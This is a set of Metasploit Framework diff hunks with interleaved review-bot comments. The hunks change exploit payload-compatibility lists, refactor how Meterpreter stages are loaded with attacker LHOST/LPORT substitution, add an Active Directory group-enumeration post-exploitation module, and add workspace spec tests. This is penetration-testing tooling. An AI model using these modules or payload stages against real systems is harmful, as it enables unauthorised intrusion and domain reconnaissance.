'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby telnet',
}
},
'Targets' =>


@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'perl python ruby bash telnet',
'RequiredCmd' => 'perl python ruby telnet',
# *_perl, *_python and *_ruby work if they are installed
}
},


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet'
'RequiredCmd' => 'generic perl ruby python telnet'
}
},
'Platform' => %w{ bsd linux osx unix win },


@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash awk ruby'
'RequiredCmd' => 'generic awk ruby'
},
# Tested:
# - CUPS version 1.4.3 on Ubuntu 10.04 (x86)


@ -69,7 +69,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp perl bash'
'RequiredCmd' => 'generic bash-tcp perl'
}
}
}


@ -44,7 +44,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => ['unix', 'linux'],


@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => ['unix', 'linux'],


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python'
'RequiredCmd' => 'generic perl ruby telnet python'
}
},
'Platform' => %w{ linux unix },


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => %w{ linux unix },


@ -35,7 +35,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python',
'RequiredCmd' => 'generic perl ruby telnet python',
}
},
'Platform' => ['unix', 'linux'],


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet bash'
'RequiredCmd' => 'generic perl telnet'
}
},
'DefaultOptions' =>


@ -33,8 +33,8 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash telnet bash-tcp',
}
},
'Platform' => 'osx',


@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'PayloadCompat' => {
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
}
],


@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic bash telnet ruby',
'RequiredCmd' => 'generic telnet ruby',
}
},
'Targets' => [ [ 'Automatic Target', { }] ],


@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic gawk bash python perl'
'RequiredCmd' => 'generic gawk python perl'
}
},
'Targets' =>


@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet netcat netcat-e bash',
'RequiredCmd' => 'generic perl telnet netcat netcat-e',
}
},
'Platform' => 'unix',


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby telnet',
}
},
'Targets' =>


@ -38,8 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet openssl',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash telnet openssl bash-tcp',
}
},
'Targets' =>


@ -34,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'RequiredCmd' => 'generic perl ruby telnet',
}
},
'Platform' => 'unix',


@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python telnet bash-tcp',
}
},
'Platform' => 'unix',


@ -39,8 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -35,8 +35,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 4000,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet'
'RequiredCmd' => 'generic perl ruby python telnet'
}
},
'Targets' =>


@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Platform' => 'unix',


@ -41,8 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Targets' => [ ['Automatic', { }], ],


@ -46,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic ruby python bash telnet'
'RequiredCmd' => 'generic ruby python telnet'
}
},
'Platform' => [ 'unix' ],


@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet netcat netcat-e bash',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl telnet netcat netcat-e bash-tcp',
}
},
'Platform' => 'unix',


@ -37,8 +37,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 4000,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet netcat netcat-e',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl bash-tcp telnet netcat netcat-e',
}
},
'Platform' => 'unix',


@ -39,8 +39,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => %w{ linux unix win },


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Targets' => [ ['Automatic', { }], ],


@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => '<>',
'Compat' =>
{
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Targets' =>


@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python ruby bash telnet',
'RequiredCmd' => 'generic perl python ruby telnet',
}
},
'Platform' => ['unix'],


@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash netcat netcat-e'
'RequiredCmd' => 'generic perl ruby python netcat netcat-e'
},
'Targets' =>
[


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python',
'RequiredCmd' => 'generic telnet netcat netcat-e perl ruby python',
}
},
'DefaultOptions' =>


@ -37,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet bash netcat netcat-e perl ruby python',
'RequiredCmd' => 'generic telnet netcat netcat-e perl ruby python',
}
},
'DefaultOptions' =>


@ -41,8 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -34,8 +34,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'ConnectionType' => 'find',
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet python'
'RequiredCmd' => 'generic perl ruby telnet python'
}
},
'Platform' => %w{ unix },


@ -46,8 +46,8 @@ class Metasploit3 < Msf::Exploit::Remote
'BadChars' => '',
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Targets' =>


@ -38,8 +38,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
}
},
'Platform' => 'unix',


@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic ruby python bash telnet'
'RequiredCmd' => 'generic ruby python telnet'
}
},
'Platform' => [ 'unix' ],


@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'PayloadType' => 'cmd',
# Based on vicibox availability of binaries
'RequiredCmd' => 'generic perl python awk bash telnet nc openssl',
'RequiredCmd' => 'generic perl python awk telnet nc openssl',
}
},
'Targets' =>


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby python bash telnet',
'RequiredCmd' => 'generic perl ruby python telnet',
}
},
'Platform' => 'unix',


@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic telnet python perl bash',
'RequiredCmd' => 'generic telnet python perl',
},
},
'Targets' =>


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 7351
CachedSize = 7359
include Msf::Payload::Single
include Msf::Payload::Java


@ -31,10 +31,7 @@ module Metasploit4
end
def generate
file = File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.php")
met = File.open(file, "rb") {|f|
f.read(f.stat.size)
}
met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')
met.gsub!("127.0.0.1", datastore['LHOST']) if datastore['LHOST']
met.gsub!("4444", datastore['LPORT'].to_s) if datastore['LPORT']


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 5097
CachedSize = 5105
include Msf::Payload::Stager
include Msf::Payload::Java


@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http'
module Metasploit3
CachedSize = 5115
CachedSize = 5123
include Msf::Payload::Stager
include Msf::Payload::Java


@ -9,7 +9,7 @@ require 'msf/core/payload/uuid/options'
module Metasploit3
CachedSize = 5924
CachedSize = 5932
include Msf::Payload::Stager
include Msf::Payload::Java


@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
module Metasploit3
CachedSize = 5110
CachedSize = 5118
include Msf::Payload::Stager
include Msf::Payload::Java


@ -25,11 +25,7 @@ module Metasploit4
end
def generate_stage(opts={})
file = File.join(Msf::Config.data_directory, "meterpreter", "meterpreter.php")
met = File.open(file, "rb") { |f|
f.read(f.stat.size)
}
met = MetasploitPayloads.read('meterpreter', 'meterpreter.php')
uuid = opts[:uuid] || generate_payload_uuid
bytes = uuid.to_raw.chars.map { |c| '\x%.2x' % c.ord }.join('')


@ -27,11 +27,7 @@ module Metasploit3
end
def generate_stage(opts={})
file = ::File.join(Msf::Config.data_directory, 'meterpreter', 'meterpreter.py')
met = ::File.open(file, 'rb') {|f|
f.read(f.stat.size)
}
met = MetasploitPayloads.read('meterpreter', 'meterpreter.py')
if datastore['PythonMeterpreterDebug']
met = met.sub("DEBUGGING = False", "DEBUGGING = True")


@ -0,0 +1,97 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex'
require 'msf/core'
class Metasploit3 < Msf::Post
include Msf::Auxiliary::Report
include Msf::Post::Windows::LDAP
# include Msf::Post::Windows::Accounts
USER_FIELDS = ['name',
'distinguishedname',
'description'].freeze
def initialize(info = {})
super(update_info(
info,
'Name' => 'Windows Gather Active Directory Groups',
'Description' => %{
This module will enumerate AD groups on the specified domain.
},
'License' => MSF_LICENSE,
'Author' => [
'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options([
OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]),
], self.class)
end
def run
@user_fields = USER_FIELDS.dup
if datastore['ADDITIONAL_FIELDS']
additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/,"").split(',')
@user_fields.push(*additional_fields)
end
max_search = datastore['MAX_SEARCH']
begin
q = query('(objectClass=group)', max_search, @user_fields)
rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
# Can't bind or in a network w/ limited accounts
print_error(e.message)
return
end
if q.nil? || q[:results].empty?
print_status('No results returned.')
else
results_table = parse_results(q[:results])
print_line results_table.to_s
end
end
# Takes the results of LDAP query, parses them into a table
# and records and usernames as {Metasploit::Credential::Core}s in
# the database.
#
# @param [Array<Array<Hash>>] the LDAP query results to parse
# @return [Rex::Ui::Text::Table] the table containing all the result data
def parse_results(results)
domain = datastore['DOMAIN'] || get_domain
domain_ip = client.net.resolve.resolve_host(domain)[:ip]
# Results table holds raw string data
results_table = Rex::Ui::Text::Table.new(
'Header' => "Domain Groups",
'Indent' => 1,
'SortIndex' => -1,
'Columns' => @user_fields
)
results.each do |result|
row = []
result.each do |field|
if field.nil?
row << ""
else
row << field[:value]
end
end
results_table << row
end
results_table
end
end
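Review bot: `parse_results` assigns `domain` and `domain_ip` and never reads either, so every run performs a host resolution through the session (`client.net.resolve.resolve_host(domain)[:ip]`) whose result is discarded; if that lookup can return nil (not verifiable from this file) the `[:ip]` would also raise. Both lines can be deleted. The comment above the method still says it records usernames as `Metasploit::Credential::Core` entries, which this code does not do; I would reduce it to `# Parses the LDAP query results into a table.` and name the parameter in the tag, `# @param results [Array<Array<Hash>>]`. `datastore['MAX_SEARCH']` is read in `run` but not registered in this file; presumably it comes from the `Msf::Post::Windows::LDAP` mixin, which is worth confirming.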


@ -13,6 +13,7 @@ class Metasploit3 < Msf::Post
UAC_DISABLED = 0x02
USER_FIELDS = ['sAMAccountName',
'name',
'userPrincipalName',
'userAccountControl',
'lockoutTime',
@ -26,12 +27,16 @@ class Metasploit3 < Msf::Post
'Name' => 'Windows Gather Active Directory Users',
'Description' => %{
This module will enumerate user accounts in the default Active Domain (AD) directory and stores
them in the database.
them in the database. If GROUP_MEMBER is set to the DN of a group, this will list the members of
that group by performing a recursive/nested search (i.e. it will list users who are members of
groups that are members of groups that are members of groups (etc) which eventually include the
target group DN.
},
'License' => MSF_LICENSE,
'Author' => [
'Ben Campbell',
'Carlos Perez <carlos_perez[at]darkoperator.com>'
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Stuart Morgan <stuart.morgan[at]mwrinfosecurity.com>'
],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
@ -42,6 +47,7 @@ class Metasploit3 < Msf::Post
OptBool.new('EXCLUDE_LOCKED', [true, 'Exclude in search locked accounts..', false]),
OptBool.new('EXCLUDE_DISABLED', [true, 'Exclude from search disabled accounts.', false]),
OptString.new('ADDITIONAL_FIELDS', [false, 'Additional fields to retrieve, comma separated', nil]),
OptString.new('GROUP_MEMBER', [false, 'Recursively list users that are effectve members of the group DN specified.', nil]),
OptEnum.new('UAC', [true, 'Filter on User Account Control Setting.', 'ANY',
[
'ANY',
@ -58,7 +64,7 @@ class Metasploit3 < Msf::Post
@user_fields = USER_FIELDS.dup
if datastore['ADDITIONAL_FIELDS']
additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/,"").split(',')
additional_fields = datastore['ADDITIONAL_FIELDS'].gsub(/\s+/, "").split(',')
@user_fields.push(*additional_fields)
end
@ -131,7 +137,6 @@ class Metasploit3 < Msf::Post
results_table
end
# Builds the LDAP query 'filter' used to find our User Accounts based on
# criteria set by user in the Datastore.
#
@ -140,6 +145,7 @@ class Metasploit3 < Msf::Post
inner_filter = '(objectCategory=person)(objectClass=user)'
inner_filter << '(!(lockoutTime>=1))' if datastore['EXCLUDE_LOCKED']
inner_filter << '(!(userAccountControl:1.2.840.113556.1.4.803:=2))' if datastore['EXCLUDE_DISABLED']
inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER']
case datastore['UAC']
when 'ANY'
when 'NO_PASSWORD'
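Review bot: The new `GROUP_MEMBER` clause interpolates the option value straight into the LDAP filter, so a group DN containing `(`, `)`, `*` or `\` yields a malformed filter or one that matches something other than the intended group. Filter assertion values need RFC 4515 escaping before interpolation, for example `dn = datastore['GROUP_MEMBER'].gsub(/[\\*()]/) { |c| '\\%02x' % c.ord }` followed by `inner_filter << "(memberof:1.2.840.113556.1.4.1941:=#{dn})" if datastore['GROUP_MEMBER']`. Smaller points in the same section: the option text has a typo (`effectve`), and the parenthesis opened at `(i.e.` in the description is never closed. The filter-building method starts and ends outside the hunk.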


@ -535,6 +535,65 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
end
describe "#cmd_workspace" do
before(:each) do
db.cmd_workspace "-D"
@output = []
end
describe "<no arguments>" do
it "should list default workspace" do
db.cmd_workspace
@output.should =~ [
"* default"
]
end
it "should list all workspaces" do
db.cmd_workspace("-a", "foo")
@output = []
db.cmd_workspace
@output.should =~ [
" default",
"* foo"
]
end
end
describe "-a" do
it "should add workspaces" do
db.cmd_workspace("-a", "foo", "bar", "baf")
@output.should =~ [
"Added workspace: foo",
"Added workspace: bar",
"Added workspace: baf"
]
end
end
describe "-d" do
it "should delete a workspace" do
db.cmd_workspace("-a", "foo")
@output = []
db.cmd_workspace("-d", "foo")
@output.should =~ [
"Deleted workspace: foo",
"Switched workspace: default"
]
end
end
describe "-D" do
it "should delete all workspaces" do
db.cmd_workspace("-a", "foo")
@output = []
db.cmd_workspace("-D")
@output.should =~ [
"Deleted and recreated the default workspace",
"Deleted workspace: foo",
"Switched workspace: default"
]
end
end
describe "-h" do
it "should show a help message" do
db.cmd_workspace "-h"
@ -544,6 +603,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do
" workspace [name] Switch workspace",
" workspace -a [name] ... Add workspace(s)",
" workspace -d [name] ... Delete workspace(s)",
" workspace -D Delete all workspaces",
" workspace -r <old> <new> Rename workspace",
" workspace -h Show this help information"
]
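Review bot: The `-D` example checks only the printed messages, so it would still pass if the command reported a deletion without actually removing the workspace. For a destructive command I would also assert the resulting state by listing afterwards: `@output = []`, `db.cmd_workspace`, `@output.should =~ ["* default"]`. The `before(:each)` hook calls `cmd_workspace "-D"` for cleanup as well, so a regression in `-D` would fail every example in this group rather than only its own; that may be acceptable if no other cleanup path is available here. The `describe "-h"` block continues outside the first hunk.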


@ -9,6 +9,10 @@ shared_context 'Msf::UIDriver' do
@output ||= []
@output.concat string.split("\n")
end
driver.stub(:print_status).with(kind_of(String)) do |string|
@output ||= []
@output.concat string.split("\n")
end
driver.stub(:print_error).with(kind_of(String)) do |string|
@error ||= []
@error.concat string.split("\n")